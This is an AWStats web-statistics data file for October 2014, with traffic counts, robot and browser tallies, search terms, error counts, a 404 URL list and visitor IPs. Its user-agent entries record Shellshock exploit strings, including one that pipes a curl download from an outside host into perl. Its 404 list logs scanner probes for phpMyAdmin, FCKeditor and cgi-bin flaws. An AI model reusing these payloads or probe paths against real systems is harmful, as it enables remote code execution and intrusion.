AWSTATS DATA FILE 6.8 (build 1.910)
# If you remove this file, all statistics for date 201410 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 1915                
POS_TIME 2585                
POS_VISITOR 22149               
POS_DAY 32939               
POS_DOMAIN 3483                
POS_LOGIN 3973                
POS_ROBOT 4128                
POS_WORMS 4902                
POS_EMAILSENDER 5033                
POS_EMAILRECEIVER 5176                
POS_SESSION 33755               
POS_SIDER 33952               
POS_FILETYPES 5311                
POS_OS 5473                
POS_BROWSER 5618                
POS_SCREENSIZE 6138                
POS_UNKNOWNREFERER 6212                
POS_UNKNOWNREFERERBROWSER 6924                
POS_ORIGIN 7123                
POS_SEREFERRALS 7264                
POS_PAGEREFS 7454                
POS_SEARCHWORDS 7683                
POS_KEYWORDS 9536                
POS_MISC 2249                
POS_ERRORS 11304               
POS_CLUSTER 3829                
POS_SIDER_404 11459               
POS_PLUGIN_geoip_city_maxmind 20571               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141101000043 815 173524 10931339907690
FirstTime 0
LastTime 20141031093807
LastUpdate 20141101055436 815 0 814 0 0
TotalVisits 254                 
TotalUnique 183                 
MonthHostsKnown 0                   
MonthHostsUnknown 318                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 8 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 28 128 3712746 520 546 1227859
1 9 50 915883 278 306 1034106
2 18 100 2266116 340 394 1611312
3 13 63 1560563 380 406 1132153
4 10 38 547950 429 459 1196071
5 9 52 1726018 774 798 1695581
6 12 47 1195437 640 689 2445650
7 26 92 2573196 603 623 1231988
8 16 67 1480460 575 606 1216504
9 47 64 978736 993 1028 1513468
10 11 71 1741963 668 693 1891938
11 8 21 219163 282 313 1558547
12 11 34 926207 127 154 728888
13 9 50 975318 200 242 1562404
14 15 48 684042 221 251 1724146
15 5 21 216797 290 314 1019618
16 6 35 378191 188 220 1636410
17 12 49 649880 167 194 1121075
18 10 44 1128619 234 254 1495958
19 8 42 580451 1295 1319 1404860
20 14 73 2182923 314 336 1062716
21 13 38 662660 300 336 1412317
22 24 113 3697594 645 671 1925471
23 21 116 4310821 1409 1429 1355869
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 20
cn 225 1296 31941076
us 38 40 564572
nl 25 25 400780
de 14 14 261664
ua 12 12 178022
ru 8 22 845176
pl 7 7 86356
unknown 6 6 80994
tw 3 3 26619
lt 3 3 46789
md 1 1 13110
ph 2 2 5716
kr 1 1 42
mx 1 1 42
gb 2 2 27283
in 1 1 5674
hk 2 2 26633
br 1 1 42
ca 2 16 775293
by 1 1 25851
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 18
spider 909 10308890 20141031231303 0
baiduspider 743 7799686 20141031233712 0
bot[+:,\.\;\/\\-] 429 7203830 20141031232831 0
sogou 169 2443996 20141031225605 0
wordpress 165 0 20141031201111 0
googlebot 158 2297734 20141031153223 0
no_user_agent 73 304710 20141030173105 0
exabot 42 730156 20141031164641 0
slurp 9 116948 20141030131529 0
archive\.org_bot 4 64319 20141001055313 0
msnbot 2 84 20141015213158 0
robot 2 30189 20141028091025 0
surveybot 3 40515 20141029032936 0
java 1 13505 20141010220543 0
turnitinbot 2 30394 20141017075249 0
mj12bot 4 54020 20141028093815 0
netcraft 3 13505 20141008142115 0
nutch 1 13505 20141016060448 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 6
php 22 74810 0 0
css 531 4413920 0 0
png 121 14347790 0 0
html 333 4858530 0 0
xml 1 1045 0 0
js 448 11615639 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 10
winxp 366
winlong 19
unix 130
winnt 601
linuxubuntu 5
win98 14
linux 111
macosx 123
win2003 1
Unknown 86
END_OS

# Browser ID - Hits
BEGIN_BROWSER 37
msie6.0 32
firefox28.0 1
firefox3.0.7 8
firefox4.0.1 4
firefox26.0 2
firefox2.0.0.1 2
firefox18.0 2
firefox8.0 3
lynx 2
curl 3
firefox31.0 1
firefox3.6.15 18
msie8.0 201
msie7.0 88
firefox16.0 285
msie5.0 1
msie9.0 32
Unknown 4
netscape 1
firefox32.0 2
opera 19
firefox3.0 2
libwww 1
firefox21.0 2
msie6.1 9
msie5.00 14
nokia 3
firefox1.0.7 1
mozilla 75
firefox14.0.1 16
msie10.0 1
firefox6.0 1
netscape4.0 49
firefox8.0.1 5
firefox15.0.1 91
safari 471
firefox3.0.15 4
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 11
Nokia5320di/UCWEB8.0.3.99/28/999 20141028125855
Mozilla 20141019133044
Mozilla/5.0_(compatible;_Lipperhey_SEO_Service;_http://www.lipperhey.com/) 20141024090416
Lynx/2.8.5rel.1_libwww-FM/2.15FC_SSL-MM/1.4.1c_OpenSSL/0.9.7e-dev 20141009140644
Mozilla/5.0_(compatible;_Muenster_University_of_Applied_Sciences;__http://fb02itsscan.fh-muenster.de) 20141021044133
Mozilla/4.0 20141031001754
libwww-perl/5.834 20141012114159
()_{_:;};_/bin/bash_-c_\ 20141022065859
Icarus6j_-_(contact:_phil@icarus6.com) 20141027210129
()_{_:;_};_curl_http://www.ykum.com//bbs/skin/zero_vote/cpan_root_|_perl 20141020000240
Robocop 20141030001132
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 3
()_{_:;};_/bin/bash_-c_\ 20141022065859
Icarus6j_-_(contact:_phil@icarus6.com) 20141027210129
Robocop 20141030001132
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 203 546
From1 6 6
From2 52 52
From3 10 10
From4 84 842
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 4
google 1 1
baidu 20 20
yandex 2 2
sogou 29 29
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 3
http://www.so.com/s 8 8
http://cn.bing.com/search 1 1
http://www.insecam.com 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 26
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2%e5%85%ac%e5%8f%b8 11
www 3
%ce%ab%b7%bb%b8%d6%cc%fa%bc%af%cd%c5%d3%d0%cf%de%b9%ab%cb%be 3
%ce%ab%b7%bb%b8%d6%cc%fa%bc%af%cd%c5%b9%ab%cb%be 3
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e5%b8%82%e7%9a%84%e9%92%a2%e9%93%81%e4%bc%81%e4%b8%9a%e7%ae%80%e4%bb%8b 2
%ce%ab%b7%bb%b8%d6%b2%c4%b3%a7 2
%ce%ab%b7%bb%be%fd%cc%da%b8%d6%cc%fa%d3%d0%cf%de%b9%ab%cb%be 1
%ce%ab%b7%bb%b8%d6%cc%fa 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e5%8e%822014%e5%b9%b4 1
%e6%bd%8d%e5%9d%8a%e6%9c%89%e5%93%aa%e4%ba%9b%e9%92%a2%e9%93%81%e5%8e%82 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a22014 1
%e5%87%8f%e8%82%a5%e8%8d%af 1
%c9%bd%b6%ab%ce%ab%b7%bb%b8%d6%cc%fa%d3%d0%cf%de%b9%ab%cb%be 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2 1
g83bpbjj9lqh3on9rxc1ayoyhuhjppzon8levf5egxuzvyv+jtul0c5qjelvp3fagt1kkyup6bydfj5srpzy+q%3d%3d 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e5%a4%a7%e7%bd%ae%e4%b8%9a%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e5%85%ac%e5%8f%b8 1
%ce%ab%b7%bb%b8%d6%cc%fa%bc%af%cd%c52014 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2 1
%e5%87%8f%e8%82%a5 1
%c9%bd%b6%ab%ce%ab%b7%bb%ca%d0%b5%c4%b8%d6%cc%fa%c6%f3%d2%b5%bc%f2%bd%e9 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81+%e9%9b%86%e5%9b%a2+%e6%9c%89%e9%99%90%e8%b4%a3%e4%bb%bb%e5%85%ac%e5%8f%b8%7c%e6%bd%8d%e5%9d%8a%e6%9c%80%e5%a4%a7%e9%92%a2%e9%93%81%e5%85%ac%e5%8f%b8 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8 1
china-spa.cn 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 30
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2%e5%85%ac%e5%8f%b8 11
www 3
%ce%ab%b7%bb%b8%d6%cc%fa%bc%af%cd%c5%d3%d0%cf%de%b9%ab%cb%be 3
%ce%ab%b7%bb%b8%d6%cc%fa%bc%af%cd%c5%b9%ab%cb%be 3
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e5%b8%82%e7%9a%84%e9%92%a2%e9%93%81%e4%bc%81%e4%b8%9a%e7%ae%80%e4%bb%8b 2
%ce%ab%b7%bb%b8%d6%b2%c4%b3%a7 2
%ce%ab%b7%bb%be%fd%cc%da%b8%d6%cc%fa%d3%d0%cf%de%b9%ab%cb%be 1
%ce%ab%b7%bb%b8%d6%cc%fa 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e5%8e%822014%e5%b9%b4 1
%e5%87%8f%e8%82%a5%e8%8d%af 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a22014 1
%e6%bd%8d%e5%9d%8a%e6%9c%89%e5%93%aa%e4%ba%9b%e9%92%a2%e9%93%81%e5%8e%82 1
%e6%9c%89%e9%99%90%e8%b4%a3%e4%bb%bb%e5%85%ac%e5%8f%b8%7c%e6%bd%8d%e5%9d%8a%e6%9c%80%e5%a4%a7%e9%92%a2%e9%93%81%e5%85%ac%e5%8f%b8 1
jtul0c5qjelvp3fagt1kkyup6bydfj5srpzy 1
g83bpbjj9lqh3on9rxc1ayoyhuhjppzon8levf5egxuzvyv 1
%c9%bd%b6%ab%ce%ab%b7%bb%b8%d6%cc%fa%d3%d0%cf%de%b9%ab%cb%be 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8 1
%e9%9b%86%e5%9b%a2 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e5%a4%a7%e7%bd%ae%e4%b8%9a%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8 1
%ce%ab%b7%bb%b8%d6%cc%fa%bc%af%cd%c52014 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e5%85%ac%e5%8f%b8 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81 1
%e5%87%8f%e8%82%a5 1
%e5%b1%b1%e4%b8%9c%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2 1
%c9%bd%b6%ab%ce%ab%b7%bb%ca%d0%b5%c4%b8%d6%cc%fa%c6%f3%d2%b5%bc%f2%bd%e9 1
q%3d%3d 1
%e6%bd%8d%e5%9d%8a%e9%92%a2%e9%93%81%e9%9b%86%e5%9b%a2%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8 1
china-spa.cn 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 6
403 4868 231244
302 3 0
500 2 5896
400 36 8990
404 1472 1664785
301 3481 828008
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 268
/admin/config.php 4 -
/admin.php 2 -
/uploadfiles/fck/editor/ 1 -
/fckeditorv2/editor/ 1 -
/edit_plus/fckeditor/editor/ 1 -
/editor/editor/filemanager/connectors/ 1 -
/plus/xsvip.php 1 -
/program/gpyedit/fckeditor/edito/ 1 -
/plus/mytag_js.php 4 -
//phpMyAdmin-2.7.0-pl2/scripts/setup.php 1 -
/fckeditor/editor/filemanager/browser/default/connectors/ 1 -
/sanqingcha/2012/0801/34.html 9 -
/cgi-sys/php5 1 -
//phpMyAdmin-2.7.0-pl1/scripts/setup.php 1 -
/rom-0 1 -
//web/phpMyAdmin/scripts/setup.php 1 -
/phpMyAdmin-2.11.3/scripts/setup.php 1 -
/cgi-sys/entropysearch.cgi 1 ()%20{%20:
/blog/fckeditor/editor/ 1 -
/HNAP1/ 3 http://76.163.168.24/
/bai/fckeditor/editor/ 1 -
/sf/ 1 -
/administrator/ 1 -
//phpMyAdmin-2.7.0-rc1/scripts/setup.php 1 -
//phpMyAdmin-2.7.6/scripts/setup.php 1 -
/lele/lel/le.php 1 -
/sscms/fckeditor/editor/ 1 -
/2012-10-09-07-43-46/8-sf/ 2 -
/_fckeditor/editor/ 1 -
/webmanage/fckeditor/editor/ 1 -
/cgi-bin/php 9 -
/newsadvises/fckeditor/editor/ 1 -
/index.html 19 -
/kouchushishimeyuanyinyinqide/2012/0811/ 1 -
/plus/guestbook.php 2 -
/2012-10-09-07-43-46/ 1 -
/hnhn/hnh/hn.php 1 -
/editor/editor/filemanager/browser/default/connectors/ 1 -
/sanqingcha/2012/0725/8.html 1 -
/6-2012-10-09-13-17-24/ 1 -
/include/vdimgck.php 2 -
//admin/pma/scripts/setup.php 1 -
/database/editor/fckeditor/editor/ 1 -
/includes/fckeditor/editor/ 1 -
/sanqingcha/list_3_1.html 6 -
/a/chanpinjieshao/ 1 -
/mpmp/mpm/mp.php 1 -
/FCKeditor/_samples/ 1 -
/ad2009/fckeditor/editor/ 1 -
/plus/download.php 2 -
/templets/img/css.css 11 -
/qmqm/qmq/qm.php 1 -
/lvyou/ 1 -
/boke/edit_plus/fckeditor/editor/ 1 -
/kouchushishimeyuanyinyinqide/list_4_2.html 1 -
/inc/editor/ 1 -
/manage/fck/editor/ 1 -
/admin/fckeditor/editor/ 1 -
/editor/FCKeditor/editor/dialog/fck_about.html 5 http://china-spa.cn/editor/FCKeditor/editor/dialog/fck_about.html
/robots.txt 255 -
/news/2010070720.html 1 -
/cgi-sys/defaultwebpage.cgi 2 ()%20{%20:
/web-console/ServerInfo.jsp 5 -
/kouchuchishimeyao/2012/0726/22.html 9 -
//php-my-admin/scripts/setup.php 1 -
/sanqingcha/2012/0725/6.html 7 -
/editor/dialog/fck_about.html 4 http://china-spa.cn/editor/dialog/fck_about.html
/kouchushishimeyuanyinyinqide/2012/0811/51.html 4 -
/scripts/fckeditor/editor/ 1 -
/mzmz/mzm/mz.php 1 -
/sanqingcha/2012/0811/50.html 1 -
/index.html/ 1 -
/FCKeditor/editor/filemanager/upload/ 1 -
/wp//wp-login.php 1 -
//phpMyAdmin-2.8.5/scripts/setup.php 1 -
/webmanage/fck/editor/ 1 -
/sanqingcha/2012/0831/66.html 6 -
//admin/scripts/setup.php 1 -
/include/fckeditor/editor/ 1 -
/wp-content/plugins/wptouch/readme.txt 1 -
/erer/ere/er.php 1 -
/bbs/dv_plus/indivgroup/edit_plus/fckeditor/editor/ 1 -
/kouchuzenmeban/2012/0726/15.html 2 -
/admin/fck/editor/ 1 -
//phpMyAdmin-2.7.5/scripts/setup.php 1 -
/FCKeditor/editor/dialog/fck_about.html 4 http://china-spa.cn/FCKeditor/editor/dialog/fck_about.html
/sanqingcha/2012/0814/60.html 8 -
/etc/lib/pChart2/examples/index.php 4 -
/plus/e7xue.php 2 -
/sanqingcha/2012/0725/ 1 -
/inc/fckeditor/editor/ 1 -
/editor/editor/filemanager/connectors/upload 1 -
/fckediter1/editor/ 1 -
/cgi-bin/php4 8 -
/admin/FCKeditor/editor/dialog/fck_about.html 5 http://china-spa.cn/admin/FCKeditor/editor/dialog/fck_about.html
//phpMyAdmin-2.8.3/scripts/setup.php 1 -
/wp-content/themes/konzept/style.css 1 -
/about.html 2 -
/cgi-bin/php5.cgi 1 -
/user/soapCaller.bs 1 -
/manage/FCKeditor/editor/dialog/fck_about.html 5 http://china-spa.cn/manage/FCKeditor/editor/dialog/fck_about.html
/kouchushishimeyuanyinyinqide/2012/0811/55.html 1 -
/kouchushishimeyuanyinyinqide/2012/0730/25.html 7 -
/cgi-bin/php-cgi 8 -
/kouchuzenmeban/2012/0813/57.html 1 -
//phpMyAdmin-2.6.4-pl3/scripts/setup.php 1 -
/upload/fck/editor/editor/ 1 -
/cgi-mod/index.cgi 1 ()%20{%20:
/FCKeditor/editor/ 1 -
/kouchuzenmeban/2012/0801/40.html 3 -
/guestbook/fckeditor/editor/ 1 -
/fckeditor/editor/ 1 -
/gkgk/gkg/gk.php 1 -
//phpMyAdmin-2.6.6/scripts/setup.php 1 -
/manage/fckeditor/editor/ 1 -
/sanqingcha/2012/0731/33.html 3 -
/wp-content/plugins/wp-filemanager/incl/libfile.php 1 -
/kouchuzenmeban/ 6 -
/pma/scripts/setup.php 12 -
/tag/%E4%BB%80%E4%B9%88%E6%98%AF%E5%87%8F%E8%82%A5%E8%8C%B6 15 -
//phpMyAdmin-2.6.4-pl4/scripts/setup.php 1 -
/css/css 1 -
/kmkm/kmk/km.php 1 -
/sanqingcha/2012/0731/32.html 1 -
/FCK/editor/dialog/fck_about.html 5 http://china-spa.cn/FCK/editor/dialog/fck_about.html
/textarea/fck/editor/ 1 -
/phpmyadmin/index.php 2 -
/data/rssmap.html 1 -
/FCKeditor/editor/filemanager/connectors/asp/ 1 -
/upload/fckeditor/editor/ 1 -
/ 75 -
//phpMyAdmin-2.8.4/scripts/setup.php 1 -
/webfckeditor/editor/ 1 -
/sanqingcha/list_3_2.html 7 -
/plus/feedback.php 28 -
/component/mailto/ 1 -
/sanqingcha/2012/0814/59.html 4 -
/fck2/editor/ 1 -
//phpMyAdmin-2/scripts/setup.php 1 -
/editor/editor/ 1 -
/admin/system/fckeditor/editor/ 1 -
//MyAdmin/scripts/setup.php 1 -
/system/fckeditor/editor/ 1 -
/fckeditor1/editor/ 1 -
//phpMyAdmin-2.8.2.3/scripts/setup.php 1 -
/sanqingcha/ 1 -
/usus/usu/us.php 1 -
/kouchushishimeyuanyinyinqide/list_4_1.html 2 -
/master/fckeditor/editor/ 1 -
//phpMyAdmin-2.7.0-beta1/scripts/setup.php 1 -
/js/fckeditor/editor/ 1 -
/FCKeditor/_samples/asp/ 1 -
/plus/ad_js.php 1 -
/kouchushishimeyuanyinyinqide/2012/0808/43.html 13 -
//phpMyAdmin-2.6.9/scripts/setup.php 1 -
/plus/flink.php 3 -
/kouchushishimeyuanyinyinqide/2012/0726/20.html 1 -
/checkupdate.asmx 1 -
/phpMyAdmin/scripts/setup.php 14 -
/wp-content/plugins/infusionsoft/readme.txt 1 -
/a/chanpinjieshao/20130308/6.html 13 -
/sanqingcha/2012/0814/ 1 -
/kouchuchishimeyao/2012/0731/31.html 8 -
//pma/scripts/setup.php 1 -
/sanqingcha/2012/0814/58.html 1 -
//phpMyAdmin-2.6.4-rc1/scripts/setup.php 1 -
//phpMyAdmin-2.8.2/scripts/setup.php 1 -
/kouchushishimeyuanyinyinqide/2012/0801/38.html 1 -
//phpMyAdmin-2.6.5/scripts/setup.php 1 -
/sjsj/sjs/sj.php 1 -
/sgsg/sgs/sg.php 1 -
/data/admin/ver.txt 3 http://www.china-spa.cn
/admin_article/fck/editor/ 1 -
/FCKeditor/editor/filemanager/browser/default/ 1 -
//mysqladmin/scripts/setup.php 1 -
/kouchuchishimeyao/2012/0731/29.html 3 -
/wp-content/plugins/wysija-newsletters/readme.txt 1 -
/kouchuchishimeyao/2012/0725/4.html 9 -
/sysadm/fckeditor/editor/ 1 -
/blog//wp-login.php 1 -
//myadmin/scripts/setup.php 1 -
/hr/5.jpg 3 -
//dbadmin/scripts/setup.php 1 -
/plus/stow.php 42 -
/administrator/index.php 1 -
/plus/recommend.php 47 -
/kouchuchishimeyao/2012/0726/16.html 3 -
/editor/editor 2 -
/kouchuzenmeban/2012/0809/48.html 6 -
/sanqingcha/2012/0725/7.html 1 -
/editors/fckeditorv2/editor/ 1 -
/kouchushishimeyuanyinyinqide/2012/0808/46.html 11 -
/mag/fckeditor/editor/ 1 -
http://xar.org/headers.php 1 http://www.xar.org/headers.php
//scripts/setup.php 1 -
/fckroots/editor/ 1 -
/kouchuzenmeban/2012/0813/ 2 -
/Fckeditor/editor 2 -
/kouchushishimeyuanyinyinqide/2012/0811/53.html 9 -
/inc/editor/fckeditor/editor/ 1 -
//phpadmin/scripts/setup.php 1 -
/a/luyouqishiyongfangfa/ 3 -
/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php 1 -
/sanqingcha/2012/0726/ 1 -
/ssadmin/fckeditor/editor/ 1 -
/fckedit/editor/ 1 -
/cgi-bin//cgi-bin/ 1 -
/golden_admin/fckeditor/editor/ 1 -
/a/luyouqishiyongfangfa/20130308/1.html 1 -
/kksafckeditor/editor/ 1 -
/2012-10-09-07-48-16/ 1 -
/news/2010052912.html 1 -
/jiudian/ 1 -
/sanqingcha/2012/0831/68.html 7 -
//phpMyAdmin-2.7.7/scripts/setup.php 1 -
/kouchushishimeyuanyinyinqide/2012/0726/10.html 3 -
/kouchushishimeyuanyinyinqide/2012/0818/ 1 -
/yfyf/yfy/yf.php 1 -
/myadmin/scripts/setup.php 12 -
/fckeditor/editor 2 -
/baike/fck/editor/ 1 -
/kouchuzenmeban/2012/0801/ 2 -
//web/scripts/setup.php 1 -
/news/2010060115.html 2 -
/cgi-bin/php.cgi 8 -
/kouchuchishimeyao/2012/0825/ 1 -
/editor/fckeditor/editor/ 1 -
//websql/scripts/setup.php 1 -
/include/dedeajax2.js 1 -
/w00tw00t.at.blackhats.romanian.anti-sec:) 2 -
/common/fckeditor/editor/ 1 -
/inc/fck/editor/ 1 -
/ezez/eze/ez.php 1 -
/cgi-bin/php5 8 -
/MyAdmin/scripts/setup.php 1 -
//xampp/phpmyadmin/scripts/setup.php 1 -
/kouchuchishimeyao/list_2_2.html 1 -
/editor/editor/dialog/fck_about.html 5 http://china-spa.cn/editor/editor/dialog/fck_about.html
//_phpmyadmin/scripts/setup.php 1 -
/tags.php 406 -
/kouchushishimeyuanyinyinqide/2012/0818/63.html 6 -
/wp-content/themes/ut-strange/style.css 1 -
/muieblackcat 1 -
/webeditor/editor/ 1 -
/sanqingcha/2012/0831/67.html 10 -
/fck/editor/ 1 -
//db/scripts/setup.php 1 -
/a/zuixinzixun/ 1 -
/wp-content/force-download.php 1 -
/cgi-bin-sdb/printenv 1 ()%20{%20:
/kouchushishimeyuanyinyinqide/2012/0730/27.html 1 -
/olluadmin/fckeditor/editor/ 1 -
/DefaultWS.asmx 1 -
/Allegro 1 -
/wp-content/themes/dazzling/inc/admin/js/media-uploader.js 1 -
/gtgt/gtg/gt.php 1 -
//admin/phpmyadmin/scripts/setup.php 1 -
/editor/ 1 -
//phpMyAdmin-2.6.1-pl2/scripts/setup.php 1 -
//typo3/phpmyadmin/scripts/setup.php 1 -
/plus/erraddsave.php 23 -
//phpMyAdmin-2.6.1-pl3/scripts/setup.php 1 -
/plus/heightsearch.php 1 -
/manager/html 2 -
/wordpress//wp-login.php 1 -
//mysql/scripts/setup.php 1 -
/fckeditor/editor/filemanager/connectors/ 1 -
/wenzhang/fckeditor/editor/ 1 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 54
cn_beijing_22 0 444 0 0
cn_guangzhou_30 0 306 0 0
cn_jinan_25 0 165 0 0
cn_zhengzhou_09 0 95 0 0
cn_shanghai_23 0 93 0 0
unknown 0 91 0 0
cn_tianjin_28 0 34 0 0
cn_changsha_11 0 34 0 0
cn_nanjing_04 0 31 0 0
cn_xian_26 0 17 0 0
ru_krasnodar_38 0 1 0 0
cn_haikou_31 0 1 0 0
us_san%20antonio_tx 0 4 0 0
cn_hangzhou_02 0 1 0 0
cn_zhuhai_30 0 2 0 0
us_san%20diego_ca 0 1 0 0
cn_shenzhen_30 0 1 0 0
md_chisinau_57 0 1 0 0
cn_taiyuan_24 0 15 0 0
cn_changchun_05 0 1 0 0
us_saint%20louis_mo 0 2 0 0
cn_jiamusi_08 0 1 0 0
cn_xiamen_07 0 1 0 0
cn_nanchang_03 0 1 0 0
us_philadelphia_pa 0 1 0 0
us_san%20bruno_ca 0 4 0 0
us_reston_va 0 10 0 0
cn_harbin_08 0 10 0 0
cn_kunming_29 0 2 0 0
us_washington_dc 0 3 0 0
cn_shenyang_19 0 1 0 0
cn_hebei_10 0 1 0 0
lt_vilnius_65 0 3 0 0
ua_kharkov_07 0 2 0 0
cn_chengdu_32 0 3 0 0
cn_fuzhou_07 0 10 0 0
cn_lanzhou_15 0 1 0 0
tw_taipei_03 0 3 0 0
ru_omsk_54 0 1 0 0
in_chennai_25 0 1 0 0
ru_samara_65 0 1 0 0
br_cotia_27 0 1 0 0
ca_laval_qc 0 16 0 0
cn_nantong_04 0 1 0 0
cn_putian_07 0 1 0 0
cn_qingdao_25 0 2 0 0
cn_longkou_25 0 2 0 0
de_muenster_07 0 2 0 0
ph_makati_d9 0 2 0 0
ru_tula_76 0 3 0 0
mx_san%20andrés%20cholula_21 0 1 0 0
cn_weifang_25 0 16 0 0
us_woodbridge_nj 0 8 0 0
us_ashburn_va 0 1 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 318
185.10.50.19 22 22 364923 20141024090421
219.143.225.2 14 14 247504 20141027220506
110.82.156.252 10 10 168788 20141014145544
220.181.141.70 10 10 135050 20141023010408
69.58.178.59 10 10 175696 20141011070252
155.133.19.32 10 10 207680 20141030155816
91.236.74.163 7 7 86356 20141012051357
123.6.6.60 7 63 3059455 20141012232623
123.126.51.81 7 7 94535 20141028125855
106.120.160.109 6 10 120664 20141028060354
123.125.71.15 0 1 23693 
183.60.215.119 0 5 31539 
183.60.213.44 0 4 51830 
220.181.132.216 0 3 130485 
82.146.55.80 4 4 97008 20141009185835
106.120.160.119 0 4 107955 
116.231.193.183 3 3 40138 20141027152530
183.60.212.187 0 7 78925 
220.181.51.56 0 1 7200 
61.135.190.69 0 3 2818 
176.102.37.85 2 2 48504 20141028093339
183.60.212.182 0 3 49608 
101.226.66.173 1 6 148942 20141028234540
193.174.89.19 2 2 26974 20141021044133
123.125.71.31 0 1 30200 
220.181.132.219 0 1 30200 
183.60.213.49 0 7 79446 
101.199.108.118 1 10 177429 20141024070646
123.125.71.19 0 1 1701 
183.60.214.92 0 3 27095 
101.199.112.51 1 10 177429 20141015011320
220.181.132.192 2 20 354858 20141013020440
